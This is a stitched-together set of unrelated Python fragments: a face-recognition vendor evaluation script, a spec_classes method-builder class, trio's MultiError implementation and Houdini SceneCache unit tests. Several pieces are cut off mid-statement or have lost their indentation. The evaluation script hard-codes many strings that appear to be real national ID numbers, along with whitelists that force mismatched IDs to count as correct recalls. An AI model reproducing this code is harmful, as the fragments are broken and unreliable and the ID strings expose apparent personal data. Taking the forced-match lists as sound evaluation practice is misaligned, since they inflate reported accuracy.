(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
(orgPID == '310222193410113610' and cpy_PID == '8486F4004F004C6C8B03B6773D52F793') or \
(orgPID == '31022219640615363X' and cpy_PID == '48DAD73262634E5E845C1237D3F46193') or \
(orgPID == '320802199001221510' and cpy_PID == 'EDB853B04345463CA0A6D17CF37F6412') or \
(orgPID == '330211197004250719' and cpy_PID == '85A2048EA163464183E2165AFA853335') or \
(orgPID == '330211197004250719' and cpy_PID == '85A2048EA163464183E2165AFA853335') or \
(orgPID == '340221197612122870' and cpy_PID == 'CA9FF646A0C44B14B64E3E75462F12E3') or \
(orgPID == '360121199403082443' and cpy_PID == '371824D81A62459D9DF3D73F89B14404') or \
(orgPID == '370402198104050649' and cpy_PID == '0F5D33CA436E4B5794EABBD63D6AA537') or \
(orgPID == '379014197404216054' and cpy_PID == '7BB62098E5F54871AFBA6AAAF1261813') or \
(orgPID == '432925194711116920' and cpy_PID == '0953B53CE4424F43AB94F9E7FE81FFF8') or \
(orgPID == '510322198010033836' and cpy_PID == '6C58703A09F44D2D84A4890963D5F746') or \
(orgPID == '51162119870920429X' and cpy_PID == '1E4C2743204F43CBA5AC9B5547DA23A0') or \
(orgPID == '51162119870920429X' and cpy_PID == '1E4C2743204F43CBA5AC9B5547DA23A0') or \
(orgPID == '513231198012220313' and cpy_PID == 'A951EBEF153C48A2BEB910294B3DB058') or \
(orgPID == '310228198104046019' and cpy_PID == 'C99F212EA65B4A22BE6AEFC728DA69F1') \
:
return True
else:
return False
def special_handling2(orgPID, orgIMGID, cpy_PID):
    """Whitelist of known mislabelled (orgPID, orgIMGID, cpy_PID) triples.

    Returns True for the four hard-coded triples (callers treat such a hit
    as a correct recall despite the differing PIDs), False otherwise.
    """
    known_mislabel = {
        ('310108197801294434', '17', '310107197203201211'),
        ('310113197403192417', '5', '310111197103170416'),
        ('310114198209140032', '5', '310222196710010211'),
        ('310222197312170214', '7', '310114197704033213'),
    }
    return (orgPID, orgIMGID, cpy_PID) in known_mislabel
def special_handling3(orgPID, cpy_PID):
    """Pairwise match overrides for five specific person IDs.

    Rules, in priority order:
    1. Five hard-coded mismatched pairs are forced to count as a match.
    2. An exact self-match of any of those five org IDs is forced NOT to
       count (the override above replaces it).
    3. Any other exact PID match counts as a match.
    4. Everything else does not.
    """
    forced_match = {
        ('372923198506065975', '372923198708143812'),
        ('320826198910202217', '31010219890602121X'),
        ('452130198601203010', '310115199307122912'),
        ('320625197909216695', '310110198010293255'),
        ('310110197412140812', '310109198312283591'),
    }
    if (orgPID, cpy_PID) in forced_match:
        return True
    # Self-matches of these five IDs are explicitly rejected.
    suppressed_self = {
        '372923198506065975', '320826198910202217', '452130198601203010',
        '320625197909216695', '310110197412140812',
    }
    if orgPID == cpy_PID and orgPID in suppressed_self:
        return False
    if orgPID == cpy_PID:
        return True
    return False
def kcf_test(threshold=0.927, resaveimgflag=False):
    """Evaluate the KCF engine over the module-level ``retlist``.

    Prints recall rate (right/all) and false-accept rate (wrong/all) at
    the given distance threshold (KCF matches when distance < threshold).
    NOTE(review): assumes each ``retlist`` line holds exactly five
    comma-separated fields -- confirm against the producer of ``retlist``.
    """
    total, recalled, misidentified = 0, 0, 0
    for raw in retlist:
        orgPID, orgImg, kcf_PID, kcf_IMG, kcf_dist = raw.strip().split(',')
        total += 1
        # Empty PID/IMG means the probe was not recalled at all.
        if resaveimgflag and kcf_PID == '' and kcf_IMG == '':
            reSaveImg(orgPID, orgImg, kcf_PID, kcf_IMG, 'kc', threshold,
                      'unrecall')
        # Treat whitelisted pairs (incl. exact matches via
        # special_handling3) as expected matches.
        expected_match = (special_handling3(orgPID, kcf_PID)
                          or special_handling(orgPID, kcf_PID)
                          or special_handling2(orgPID, orgImg, kcf_PID))
        if expected_match and float(kcf_dist) < threshold:
            recalled += 1
            continue
        # A different, non-empty PID under the threshold is a false accept.
        if orgPID != kcf_PID and kcf_PID != '' and float(kcf_dist) < threshold:
            misidentified += 1
            print(orgPID, kcf_PID)
            if resaveimgflag:
                reSaveImg(orgPID, orgImg, kcf_PID, kcf_IMG, 'kc', threshold,
                          'error')
    print('暴力库_threshold:', threshold, '召回率:', recalled / total,
          '误识率:', misidentified / total)
def st_test(threshold=0.927, resaveimgflag=False):
    """Evaluate the 'st' engine over the module-level ``retlist``.

    Prints recall rate and false-accept rate at the given similarity
    threshold (matches when similarity > threshold).
    NOTE(review): assumes the 17-field combined line format
    (kcf/st/yt columns) -- confirm against the producer of ``retlist``.
    """
    total, recalled, misidentified = 0, 0, 0
    for raw in retlist:
        (orgPID, orgIMG,
         _, kcf_similarity, kcf_dist, kcf_PID, kcf_IMG,
         _, st_similarity, _, st_PID, st_IMGID,
         _, yt_similarity, _, yt_PID, yt_IMGID) = raw.strip().split(',')
        total += 1
        # Empty PID/IMG means the probe was not recalled at all.
        if resaveimgflag and st_PID == '' and st_IMGID == '':
            reSaveImg(orgPID, orgIMG, st_PID, st_IMGID.strip(), 'st',
                      threshold, 'unrecall')
        expected_match = (orgPID == st_PID
                          or special_handling(orgPID, st_PID)
                          or special_handling2(orgPID, orgIMG, st_PID))
        if expected_match and float(st_similarity) > threshold:
            recalled += 1
            continue
        # A different, non-empty PID above the threshold is a false accept.
        if orgPID != st_PID and st_PID != '' and \
                float(st_similarity) > threshold:
            misidentified += 1
            if resaveimgflag:
                reSaveImg(orgPID, orgIMG, st_PID, st_IMGID.strip(), 'st',
                          threshold, 'error')
    print('商汤_threshold:', threshold, '召回率:', recalled / total,
          '误识率:', misidentified / total)
def yt_test(threshold=0.927,resaveimgflag=False):
all = 0
right = 0
wrong = 0
for line in retlist:
line = line.strip()
orgPID, orgIMG, \
_, kcf_similarity, kcf_dist, kcf_PID, kcf_IMG, \
_, st_similarity, _, st_PID, st_IMGID, \
_, yt_similarity, _, yt_PID, yt_IMGID = line.split(',')
all = all + 1
if resaveimgflag and yt_PID=='' and yt_IMGID=='': #未召回
reSaveImg(orgPID, orgIMG, yt_PID, yt_IMGID.strip(), 'yt', threshold, 'unrecall')
# yt
if orgPID == yt_PID or special_handling(orgPID,yt_PID) or special_handling2(orgPID,orgIMG,yt_PID):
if float(yt_similarity) > threshold:
# 正确召回
right = right + 1
continue
if orgPID != yt_PID and yt_PID!='':
#print(yt_similarity)
if float(yt_similarity) > threshold:
# 误识召回
wrong = wrong + 1
if resaveimgflag :
reSaveImg(orgPID, orgIMG, yt_PID, yt_IMGID.strip(), 'yt', threshold, 'error')
print('依图_threshold:', threshold, '召回率:', | |
from __future__ import annotations
import inspect
import textwrap
from inspect import Parameter, Signature, cleandoc
from typing import Any, Callable, Dict, List, Optional, Tuple, Type, Union
from spec_classes.types import MISSING
from spec_classes.utils.type_checking import type_label
class MethodBuilder:
"""
Build a user-friendly wrapper around a callable implementation.
    Methods built using this builder are:
- documented
- annotated
- potentially more restrictive than the underlying callable (for example
perhaps certain attributes cannot be passed).
Within spec-classes this builder is used to generate all helper methods,
so that users can introspect the method using `help` (or other tools)
and get useful information.
After the specification is completed by the various `.with_*()` methods, you
should call `.build()` to assemble the method and retrieve the function
handle.
Attributes:
Passable via constructor:
name: The name of the method being built.
implementation: The underlying callable around which the method is being
built.
Populated via builder methods:
doc_preamble: The preamble in the documentation string (to which
argument documentation will be appended).
doc_args: The docstrings for each argument to the method being
built (in the order they were added).
doc_returns: A string description of the value returned by the
method being built.
doc_notes: Any additional strings to be appended as notes in the
methods docstring.
method_args: A list of `Parameters` for the method signature.
method_args_virtual: A list of "virtual" `Parameters` for the method
signature (see notes below).
method_return_type: The return type of the method being built.
Notes:
- "virtual" arguments are arguments that are not directly encoded into
the generated method's signature, but which should appear in the
user-facing advertised signature. Under the hood these are fed into
the method via `**kwargs`. These are useful when you don't want
attrs to be present in the `**kwargs` of an implementation unless
the user has explicitly passed them. Also note that default values
for virtual arguments are only for documentation purposes, and are
not passed on to the underlying implementation. For this reason they
          should not be populated unless they correspond to underlying defaults.
"""
def __init__(self, name: str, implementation: Callable):
self.name = name
self.implementation = implementation
# Documentation attributes
self.doc_preamble: str = ""
self.doc_args: List[str] = []
self.doc_returns: str = ""
self.doc_notes: List[str] = []
# Method signature
self.method_args: List[Parameter] = [
Parameter("self", Parameter.POSITIONAL_OR_KEYWORD)
]
self.method_args_virtual: List[Parameter] = []
self.method_return_type: Optional[Type] = None
self.check_attrs_match_sig = ( # TODO: Remove this
True # This is toggled if signature contains a var_kwarg parameter.
)
# Signature related methods
def with_arg(
self,
name: str,
*,
desc: str,
annotation: Type = Parameter.empty,
default: Any = Parameter.empty,
kind: Union[str, inspect._ParameterKind] = Parameter.POSITIONAL_OR_KEYWORD,
virtual: bool = False,
only_if: bool = True,
) -> MethodBuilder:
"""
Append an argument to the method wrapper. The kind of the argument must
make sense given the arguments already in the method (e.g. `VAR_KEYWORD`
attributes should come after all other arguments, etc).
Args:
name: The name of the argument.
desc: A description for the argument (will be added to the method
docstring).
annotation: An (optional) type for the argument.
default: A default value for the argument (optional unless `kind`
is `KEYWORD_ONLY`.
kind: The kind of argument. For convenience you can pass a string
here instead of the enum value. Options are: 'positional_only',
'positional_or_keyword', 'var_positional', 'keyword_only',
and 'var_keyword'. Note that virtual arguments can only be
'keyword_only' and 'var_keyword'.
virtual: Whether the arguments should be compiled into the method
(False), or simulated via **kwargs under the hood (True). This
is useful when you do not want the argument appearing in the
underlying implementation's `**kwargs` argument unless manually
supplied by the user.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if:
return self
if isinstance(kind, str):
kind = inspect._ParameterKind[kind.upper()]
# Runtime checks
if virtual:
if kind not in (Parameter.VAR_KEYWORD, Parameter.KEYWORD_ONLY):
raise RuntimeError(
f"Virtual arguments can only be `KEYWORD_ONLY` or `VAR_KEYWORD`, not `{kind.name}`."
)
if self.method_args_virtual and self.method_args_virtual[
-1
].kind.value > min(kind.value, Parameter.KEYWORD_ONLY.value):
raise RuntimeError(
f"Virtual arguments of kind `{kind.name}` cannot be added after `{self.method_args_virtual[-1].kind.name}` arguments."
)
elif self.method_args and self.method_args[-1].kind.value > min(
kind.value, Parameter.KEYWORD_ONLY.value
):
raise RuntimeError(
f"Arguments of kind `{kind.name}` cannot be added after `{self.method_args[-1].kind.name}` arguments."
)
self.doc_args.append(
"\n".join(
textwrap.wrap(
f"{name}: {desc or 'Undocumented argument.'}",
subsequent_indent=" ",
)
)
)
# If this is the first virtual argument, append a `kwargs` non-virtual argument to collect these virtual arguments.
if virtual and not self.method_args_virtual:
self.method_args.append(Parameter("kwargs", kind=Parameter.VAR_KEYWORD))
(self.method_args_virtual if virtual else self.method_args).append(
Parameter(
name,
kind=kind,
default=default,
annotation=annotation,
)
)
if virtual and kind is Parameter.VAR_KEYWORD:
self.check_attrs_match_sig = False
return self
def with_args(
self,
args: Union[List[str], Dict[str, str]],
*,
annotations: Optional[Dict[str, Type]] = None,
defaults: Optional[Dict[str, Any]] = None,
virtual: bool = False,
only_if: bool = True,
) -> MethodBuilder:
"""
Append multiple arguments at once to the method wrapper. This is a
convenience wrapper only, and just makes out calls to `with_arg`. All
arguments are assumed to be of kind `KEYWORD_ONLY`.
Args:
args: A list of argument names, or a mapping of argument names to
descriptions.
annotations: An optional mapping from argument name to annotation
for that argument.
defaults: An optional mapping from argument name to default values.
kind: The kind of argument. For convenience you can pass a string
here instead of the enum value. Options are: 'positional_only',
'positional_or_keyword', 'var_positional', 'keyword_only',
and 'var_keyword'. Note that virtual arguments can only be
'keyword_only' and 'var_keyword'.
virtual: Whether the arguments should be compiled into the method
(False), or simulated via **kwargs under the hood (True). This
is useful when you do not want the argument appearing in the
underlying implementation's `**kwargs` argument unless manually
supplied by the user.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if or not args:
return self
# Remove any arguments that already exist in the function signature.
duplicate_args = {
*(arg.name for arg in self.method_args),
*(arg.name for arg in self.method_args_virtual),
}.intersection(args)
if duplicate_args:
raise RuntimeError(
f"Method already has some incoming arguments: {duplicate_args}"
)
# Cast to a dictionary so we only have to deal with one format.
if not isinstance(args, dict):
args = {arg: None for arg in args}
defaults = defaults or {}
for name, desc in args.items():
self.with_arg(
name,
desc=desc,
annotation=(annotations or {}).get(name, Parameter.empty),
default=(defaults or {}).get(name, MISSING),
kind=Parameter.KEYWORD_ONLY,
virtual=virtual,
)
return self
def with_spec_attrs_for(
self,
spec_cls: type,
*,
desc_template: Optional[str] = None,
only_if: bool = True,
) -> MethodBuilder:
"""
Add virtual arguments corresponding to the attributes of a spec-class.
This uses `.with_args` and `.with_arg` under the hood.
Args:
spec_cls: The spec class for which arguments should be added to the
method (one for each spec-class attribute).
desc_template: If provided, should be a template with one unnamed
format parameter `{}` (which will be replaced with the attribute
name); otherwise the attribute descriptions will be used.
only_if: If `False`, this method is a no-op.
Returns:
A reference to this `MethodBuilder`.
"""
if not only_if or not hasattr(spec_cls, "__spec_class__"):
return self
args = {}
annotations = {}
defaults = {}
current_args = {
*(arg.name for arg in self.method_args),
*(arg.name for arg in self.method_args_virtual),
}
for attr, attr_spec in spec_cls.__spec_class__.attrs.items():
if (
not attr_spec.init
or attr in current_args
or attr == spec_cls.__spec_class__.init_overflow_attr
):
continue
args[attr] = (
desc_template.format(attr_spec.name)
if desc_template is not None
else attr_spec.desc
)
annotations[attr] = attr_spec.type
defaults[attr] = MISSING if attr_spec.is_masked else attr_spec.default
self.with_args(
args=args,
annotations=annotations,
defaults=defaults,
virtual=True,
)
if spec_cls.__spec_class__.init_overflow_attr:
attr_spec = spec_cls.__spec_class__.attrs[
spec_cls.__spec_class__.init_overflow_attr
]
self.with_arg(
name=attr_spec.name,
desc=attr_spec.desc,
annotation=attr_spec.type,
kind=Parameter.VAR_KEYWORD,
virtual=True,
)
return self
def with_returns(
self, desc: str, *, annotation: Type = Parameter.empty, only_if: bool = True
) -> MethodBuilder:
"""
Specify the return type and description of the method being built.
Args:
spec_cls: The spec class for which arguments should be added to the
method (one for each spec-class attribute).
desc: A description for the returned value (will be added to the
method docstring).
annotation: An (optional) | |
import sys
import traceback
import textwrap
import warnings
import attr
__all__ = ["MultiError"]
################################################################
# MultiError
################################################################
def _filter_impl(handler, root_exc):
    """Apply ``handler`` to every leaf exception in the tree rooted at
    ``root_exc`` and return the simplified result: ``root_exc`` itself if
    nothing changed, a new (smaller) tree, or ``None`` if every leaf was
    swallowed.  Each surviving leaf's effective (concatenated) traceback
    is preserved.
    """
    # We have a tree of MultiError's, like:
    #
    #   MultiError([
    #       ValueError,
    #       MultiError([
    #           KeyError,
    #           ValueError,
    #       ]),
    #   ])
    #
    # or similar.
    #
    # We want to
    # 1) apply the filter to each of the leaf exceptions -- each leaf
    #    might stay the same, be replaced (with the original exception
    #    potentially sticking around as __context__ or __cause__), or
    #    disappear altogether.
    # 2) simplify the resulting tree -- remove empty nodes, and replace
    #    singleton MultiError's with their contents, e.g.:
    #        MultiError([KeyError]) -> KeyError
    #    (This can happen recursively, e.g. if the two ValueErrors above
    #    get caught then we'll just be left with a bare KeyError.)
    # 3) preserve sensible tracebacks
    #
    # It's the tracebacks that are most confusing. As a MultiError
    # propagates through the stack, it accumulates traceback frames, but
    # the exceptions inside it don't. Semantically, the traceback for a
    # leaf exception is the concatenation the tracebacks of all the
    # exceptions you see when traversing the exception tree from the root
    # to that leaf. Our correctness invariant is that this concatenated
    # traceback should be the same before and after.
    #
    # The easy way to do that would be to, at the beginning of this
    # function, "push" all tracebacks down to the leafs, so all the
    # MultiErrors have __traceback__=None, and all the leafs have complete
    # tracebacks. But whenever possible, we'd actually prefer to keep
    # tracebacks as high up in the tree as possible, because this lets us
    # keep only a single copy of the common parts of these exception's
    # tracebacks. This is cheaper (in memory + time -- tracebacks are
    # unpleasantly quadratic-ish to work with, and this might matter if
    # you have thousands of exceptions, which can happen e.g. after
    # cancelling a large task pool, and no-one will ever look at their
    # tracebacks!), and more importantly, factoring out redundant parts of
    # the tracebacks makes them more readable if/when users do see them.
    #
    # So instead our strategy is:
    # - first go through and construct the new tree, preserving any
    #   unchanged subtrees
    # - then go through the original tree (!) and push tracebacks down
    #   until either we hit a leaf, or we hit a subtree which was
    #   preserved in the new tree.

    # This used to also support async handler functions. But that runs into:
    #   https://bugs.python.org/issue29600
    # which is difficult to fix on our end.

    # Filters a subtree, ignoring tracebacks, while keeping a record of
    # which MultiErrors were preserved unchanged
    def filter_tree(exc, preserved):
        if isinstance(exc, MultiError):
            new_exceptions = []
            changed = False
            for child_exc in exc.exceptions:
                new_child_exc = filter_tree(child_exc, preserved)
                if new_child_exc is not child_exc:
                    changed = True
                if new_child_exc is not None:
                    new_exceptions.append(new_child_exc)
            if not new_exceptions:
                # Every child was swallowed, so this node disappears too.
                return None
            elif changed:
                return MultiError(new_exceptions)
            else:
                preserved.add(exc)
                return exc
        else:
            new_exc = handler(exc)
            # Our version of implicit exception chaining
            if new_exc is not None and new_exc is not exc:
                new_exc.__context__ = exc
            return new_exc

    # Pushes the accumulated traceback ``tb`` down onto ``exc`` and its
    # children, stopping at subtrees recorded in ``preserved``.
    def push_tb_down(tb, exc, preserved):
        if exc in preserved:
            return
        new_tb = concat_tb(tb, exc.__traceback__)
        if isinstance(exc, MultiError):
            for child_exc in exc.exceptions:
                push_tb_down(new_tb, child_exc, preserved)
            exc.__traceback__ = None
        else:
            exc.__traceback__ = new_tb

    preserved = set()
    new_root_exc = filter_tree(root_exc, preserved)
    # Note: tracebacks are pushed down the ORIGINAL tree; preserved
    # subtrees keep their frames high up, everything else is moved to
    # the leaves.
    push_tb_down(None, root_exc, preserved)
    return new_root_exc
# Normally I'm a big fan of (a)contextmanager, but in this case I found it
# easier to use the raw context manager protocol, because it makes it a lot
# easier to reason about how we're mutating the traceback as we go. (End
# result: if the exception gets modified, then the 'raise' here makes this
# frame show up in the traceback; otherwise, we leave no trace.)
@attr.s(frozen=True)
class MultiErrorCatcher:
    # Context manager returned by MultiError.catch(): on exit it runs
    # MultiError.filter with the stored handler and re-raises whatever
    # survives filtering.

    # The handler callable passed through to MultiError.filter.
    _handler = attr.ib()

    def __enter__(self):
        # Nothing to set up -- all of the work happens in __exit__.
        pass

    def __exit__(self, etype, exc, tb):
        if exc is not None:
            filtered_exc = MultiError.filter(self._handler, exc)
            if filtered_exc is exc:
                # Let the interpreter re-raise it
                return False
            if filtered_exc is None:
                # Swallow the exception
                return True
            # When we raise filtered_exc, Python will unconditionally blow
            # away its __context__ attribute and replace it with the original
            # exc we caught. So after we raise it, we have to pause it while
            # it's in flight to put the correct __context__ back.
            old_context = filtered_exc.__context__
            try:
                raise filtered_exc
            finally:
                _, value, _ = sys.exc_info()
                assert value is filtered_exc
                value.__context__ = old_context
class MultiError(BaseException):
    """An exception that contains other exceptions; also known as an
    "inception".

    It's main use is to represent the situation when multiple child tasks
    all raise errors "in parallel".

    Args:
      exceptions (list): The exceptions

    Returns:
      If ``len(exceptions) == 1``, returns that exception. This means that
      a call to ``MultiError(...)`` is not guaranteed to return a
      :exc:`MultiError` object!

      Otherwise, returns a new :exc:`MultiError` object.

    Raises:
      TypeError: if any of the passed in objects are not instances of
          :exc:`BaseException`.
    """

    def __new__(cls, exceptions):
        excs = list(exceptions)
        for candidate in excs:
            if isinstance(candidate, BaseException):
                continue
            raise TypeError(
                "Expected an exception object, not {!r}".format(candidate)
            )
        if len(excs) == 1:
            # Collapse singleton wrappers: hand back the lone exception
            # itself rather than wrapping it.
            return excs[0]
        inst = BaseException.__new__(cls)
        inst.exceptions = excs
        return inst

    def __str__(self):
        return ", ".join(map(repr, self.exceptions))

    def __repr__(self):
        return "<MultiError: {}>".format(self)

    @classmethod
    def filter(cls, handler, root_exc):
        """Apply the given ``handler`` to all the exceptions in ``root_exc``.

        Args:
          handler: A callable that takes an atomic (non-MultiError) exception
              as input, and returns either a new exception object or None.
          root_exc: An exception, often (though not necessarily) a
              :exc:`MultiError`.

        Returns:
          A new exception object in which each component exception ``exc``
          has been replaced by the result of running ``handler(exc)`` -- or,
          if ``handler`` returned None for all the inputs, returns None.
        """
        return _filter_impl(handler, root_exc)

    @classmethod
    def catch(cls, handler):
        """Return a context manager that catches and re-throws exceptions
        after running :meth:`filter` on them.

        Args:
          handler: as for :meth:`filter`
        """
        return MultiErrorCatcher(handler)
# Clean up exception printing:
MultiError.__module__ = "trio"

################################################################
# concat_tb
################################################################

# We need to compute a new traceback that is the concatenation of two existing
# tracebacks. This requires copying the entries in 'head' and then pointing
# the final tb_next to 'tail'.
#
# NB: 'tail' might be None, which requires some special handling in the ctypes
# version.
#
# The complication here is that Python doesn't actually support copying or
# modifying traceback objects, so we have to get creative...
#
# On CPython, we use ctypes. On PyPy, we use "transparent proxies".
#
# Jinja2 is a useful source of inspiration:
#   https://github.com/pallets/jinja/blob/master/jinja2/debug.py

# Feature-detect transparent-proxy support: the `tputil` module only
# exists on PyPy builds that provide it.
try:
    import tputil
except ImportError:
    have_tproxy = False
else:
    have_tproxy = True
if have_tproxy:
    # http://doc.pypy.org/en/latest/objspace-proxies.html
    def copy_tb(base_tb, tb_next):
        """Return a "copy" of ``base_tb`` whose ``tb_next`` attribute reads
        as ``tb_next`` -- implemented as a transparent proxy around the
        original traceback, since tracebacks can't be mutated directly.
        """
        def controller(operation):
            # Rationale for pragma: I looked fairly carefully and tried a few
            # things, and AFAICT it's not actually possible to get any
            # 'opname' that isn't __getattr__ or __getattribute__. So there's
            # no missing test we could add, and no value in coverage nagging
            # us about adding one.
            if operation.opname in [
                "__getattribute__", "__getattr__"
            ]:  # pragma: no cover
                if operation.args[0] == "tb_next":
                    return tb_next
            return operation.delegate()
        return tputil.make_proxy(controller, type(base_tb), base_tb)
else:
    # ctypes it is
    import ctypes
    # How to handle refcounting? I don't want to use ctypes.py_object because
    # I don't understand or trust it, and I don't want to use
    # ctypes.pythonapi.Py_{Inc,Dec}Ref because we might clash with user code
    # that also tries to use them but with different types. So private _ctypes
    # APIs it is!
    import _ctypes

    class CTraceback(ctypes.Structure):
        # ctypes view of a traceback object: a generic object header
        # followed by the tb_* fields, so that tb_next can be written
        # from the outside.  NOTE(review): field layout presumably mirrors
        # CPython's internal PyTracebackObject -- confirm against the
        # CPython version in use.
        _fields_ = [
            ("PyObject_HEAD", ctypes.c_byte * object().__sizeof__()),
            ("tb_next", ctypes.c_void_p),
            ("tb_frame", ctypes.c_void_p),
            ("tb_lasti", ctypes.c_int),
            ("tb_lineno", ctypes.c_int),
        ]
def copy_tb(base_tb, tb_next):
# TracebackType has no public constructor, so allocate one the hard way
try:
raise ValueError
except ValueError as exc:
new_tb = exc.__traceback__
c_new_tb = CTraceback.from_address(id(new_tb))
# At the C level, tb_next either pointer to the next traceback or is
# NULL. c_void_p and the .tb_next accessor both convert NULL | |
IECore.InternedStringVectorData( [ "1", "2" ] ) )
self.assertEqual( b.readAttribute( IECore.LinkedScene.timeLinkAttribute, 0 ), IECore.DoubleData( 0 ) )
d = a.child( "4" )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.fileNameLinkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.rootLinkAttribute ) )
self.assertFalse( d.hasAttribute( IECore.LinkedScene.timeLinkAttribute ) )
# force b and below as links even though they are expanded
hou.setTime( -1.0 / hou.fps() )
xform = self.xform()
xform.parm( "expand" ).pressButton()
rop = self.rop( xform )
rop.parm( "file" ).set( TestSceneCache.__testLinkedOutFile )
rop.parm( "forceObjects" ).set( "*4*" )
testLinks()
# make sure parents expand if their child is forced
rop.parm( "forceObjects" ).set( "*5*" )
testLinks()
# make sure normal geo gets expanded regardless
geo = xform.createNode( "geo", "real" )
geo.createNode( "box" )
testLinks( bakedObjects = [ "real" ] )
unlinked = IECore.SceneCache( TestSceneCache.__testLinkedOutFile, IECore.IndexedIO.OpenMode.Read )
real = unlinked.child( "real" )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.linkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.fileNameLinkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.rootLinkAttribute ) )
self.assertFalse( real.hasAttribute( IECore.LinkedScene.timeLinkAttribute ) )
self.assertTrue( real.hasObject() )
geo.destroy()
# make sure natural links (unexpanded branches) still work
hou.node( xform.path() + "/1/2" ).parm( "collapse" ).pressButton()
testLinks()
# make sure normal SceneCaches aren't broken by forceObjects
rop.parm( "file" ).set( TestSceneCache.__testOutFile )
self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
rop.parm( "execute" ).pressButton()
self.assertEqual( rop.errors(), "" )
self.assertTrue( os.path.exists( TestSceneCache.__testOutFile ) )
orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
result = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
self.compareScene( orig, result )
    def testRopErrors( self ) :
        """Exercise the ROP failure modes (bad output path, bogus root
        object, deleted root node, SOP used as root) and confirm a valid
        xform root finally renders cleanly."""
        xform = self.xform()
        rop = self.rop( xform )
        # unwritable/bogus output file
        rop.parm( "file" ).set( "/tmp/bad.file" )
        rop.parm( "execute" ).pressButton()
        self.assertNotEqual( rop.errors(), "" )
        self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
        # non-existent root object
        rop.parm( "file" ).set( TestSceneCache.__testOutFile )
        rop.parm( "rootObject" ).set( "/obj/fake/object" )
        # NOTE(review): no execute press before this errors() check --
        # presumably rop.errors() still reports the previous render's
        # failure; confirm this is intentional.
        self.assertNotEqual( rop.errors(), "" )
        self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
        # root node destroyed after being assigned
        rop.parm( "rootObject" ).set( xform.path() )
        xform.destroy()
        self.assertNotEqual( rop.errors(), "" )
        self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
        # a SOP is not a valid root object
        sop = self.sop()
        rop.parm( "rootObject" ).set( sop.path() )
        rop.parm( "execute" ).pressButton()
        self.assertNotEqual( rop.errors(), "" )
        self.assertFalse( os.path.exists( TestSceneCache.__testOutFile ) )
        # a fresh xform root renders without errors
        newXform = self.xform()
        rop.parm( "rootObject" ).set( newXform.path() )
        rop.parm( "execute" ).pressButton()
        self.assertEqual( rop.errors(), "" )
        self.assertTrue( os.path.exists( TestSceneCache.__testOutFile ) )
def testAnimatedRop( self ) :
self.writeAnimSCC()
xform = self.xform()
xform.parm( "hierarchy" ).set( IECoreHoudini.SceneCacheNode.Hierarchy.Parenting )
xform.parm( "expand" ).pressButton()
rop = self.rop( xform )
rop.parm( "trange" ).set( 1 )
rop.parmTuple( "f" ).set( ( 0, 10 * hou.fps(), 1 ) )
rop.parm( "execute" ).pressButton()
orig = IECore.SceneCache( TestSceneCache.__testFile, IECore.IndexedIO.OpenMode.Read )
output = IECore.SceneCache( TestSceneCache.__testOutFile, IECore.IndexedIO.OpenMode.Read )
times = range( 0, 10 )
halves = [ x + 0.5 for x in times ]
quarters = [ x + 0.25 for x in times ]
times.extend( [ x + 0.75 for x in times ] )
times.extend( halves )
times.extend( quarters )
times.sort()
for time in times :
self.compareScene( orig, output, time )
    def testRopCookCounts( self ) :
        """Verify the ROP only re-cooks SOPs when necessary: static
        geometry cooks once while animated geometry re-cooks per frame."""
        self.writeAnimSCC()
        xform = self.xform()
        xform.parm( "expand" ).pressButton()
        a = hou.node( xform.path()+"/1/geo/1" ) # static
        b = hou.node( xform.path()+"/1/2/geo/2" ) # animated
        c = hou.node( xform.path()+"/1/2/3/geo/3" ) # static
        # make sure nothing has been cooked
        self.assertEqual( a.cookCount(), 0 )
        self.assertEqual( b.cookCount(), 0 )
        self.assertEqual( c.cookCount(), 0 )
        # cook current frame
        rop = self.rop( xform )
        rop.parm( "execute" ).pressButton()
        self.assertEqual( rop.errors(), "" )
        self.assertEqual( a.cookCount(), 1 )
        self.assertEqual( b.cookCount(), 1 )
        self.assertEqual( c.cookCount(), 1 )
        # cook single frame that is not the current frame; only the
        # animated node should cook again
        self.assertNotEqual( hou.frame(), 10 )
        rop.parm( "trange" ).set( 1 )
        rop.parm( "f1" ).set( 10 )
        rop.parm( "f2" ).set( 10 )
        rop.parm( "execute" ).pressButton()
        self.assertEqual( rop.errors(), "" )
        self.assertEqual( a.cookCount(), 1 )
        self.assertEqual( b.cookCount(), 2 )
        self.assertEqual( c.cookCount(), 1 )
        # cook a range
        rop.parm( "f1" ).set( 1 )
        rop.parm( "f2" ).set( 10 )
        rop.parm( "execute" ).pressButton()
        self.assertEqual( rop.errors(), "" )
        self.assertEqual( a.cookCount(), 1 )
        # NOTE(review): 12 cooks for a 10-frame range -- presumably two
        # extra cooks come from the render setup; confirm against the ROP
        # implementation.
        self.assertEqual( b.cookCount(), 12 )
        self.assertEqual( c.cookCount(), 1 )
        # with flat geo
        sop = self.sop()
        self.assertEqual( sop.cookCount(), 0 )
        rop.parm( "rootObject" ).set( sop.parent().path() )
        rop.parm( "trange" ).set( 1 )
        rop.parm( "f1" ).set( 10 )
        rop.parm( "f2" ).set( 10 )
        rop.parm( "execute" ).pressButton()
        self.assertEqual( sop.cookCount(), 1 )
    def testRopDynamicSopHierarchy( self ) :
        """Write a cache whose SOP contents change over the frame range
        (a primitive is deleted for part of it) and check that
        scene:visible attributes are written accordingly."""
        self.writeAnimSCC()
        obj = self.geometry()
        obj.parm( "expand" ).pressButton()
        # delete one primitive (range 2-2) from the flattened geometry
        delete = obj.renderNode().createOutputNode( "delete" )
        delete.parm( "groupop" ).set( 1 ) # by range
        delete.parm( "rangestart" ).set( 2 )
        delete.parm( "rangeend" ).set( 2 )
